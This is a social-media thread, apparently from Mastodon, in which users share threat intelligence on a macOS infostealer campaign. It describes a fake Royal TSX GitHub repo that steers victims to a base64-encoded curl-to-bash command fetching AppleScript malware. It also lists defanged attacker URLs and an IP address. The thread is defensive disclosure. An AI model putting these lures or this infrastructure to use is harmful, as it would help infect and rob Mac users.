JeffreyJan 5

Nice, I've found an infostealer and macOS malware in the wild!

This repo just has some info and a download button for a paid macOS app.

It links to hxxps://za-loop-osx-software[.]github[.]io/.github/RoyalTSX, which redirects you to hxxps://github[.]topic-developer[.]com/packages.html, which tells you to run a curl command and pipe it into bash, encoded in a base64 string.

The curl command grabs a file from 217[.]119[.]139[.]117, which looks like an infostealer and some other malware written in AppleScript.

Have fun SOC people.

#threatintel #macos #cybersecurity

GitHub - Royal-TSX-Mac-License-App/Royal-TSX-Mac: Comprehensive remote connection manager for macOS with support for RDP, VNC, SSH, and FTP with credential management and team sharing features.

Comprehensive remote connection manager for macOS with support for RDP, VNC, SSH, and FTP with credential management and team sharing features. - Royal-TSX-Mac-License-App/Royal-TSX-Mac

GitHub
Show threadRecklessPush38671

@jtig Here's a few more that are probably from the same campaign. FYI.

hxxps[:]//osnoebeetleking8afm25[.]github[.]io/apremiumgft2025
hxxps[:]//mendyo541wwo5x[.]github[.]io/apremimgift2025
hxxps[:]//darkangeltkyxs[.]github[.]io/mocos-preml-gift2025
hxxps[:]//sandstormfontrihar[.]github[.]io/mocs-premlms-gift2025
hxxps[:]//hardskill1973njeuy[.]github[.]io/mocos-prmlms-gift2025
hxxps[:]//dagger2009hmuuf[.]github[.]io/moos-premus-gift2025

Jan 5 at 9:00pmWeb
Show threadJeffreyJan 6
@RecklessPush38671 nice! How did you find this?
Show threadRecklessPush38671Jan 6

@jtig I was using URLScan Pro. This campaign has come up in the past at work and I've gotten pretty good at finding these pages using URLscan.

FWIW, this seems to be the same campaign that Huntress wrote about last month. The early stages of the attack are different but the rest of it looks to be the same. They go into some good detail about the malware, too.

https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust

AI-Poisoning & AMOS Stealer: How Trust Became the Biggest Mac Threat | Huntress

Attackers are exploiting user trust in AI and aggressive SEO to deliver an evolved Atomic macOS Stealer. Learn why this social engineering tradecraft bypasses traditional network controls and the future of macOS infostealer defense.

Huntress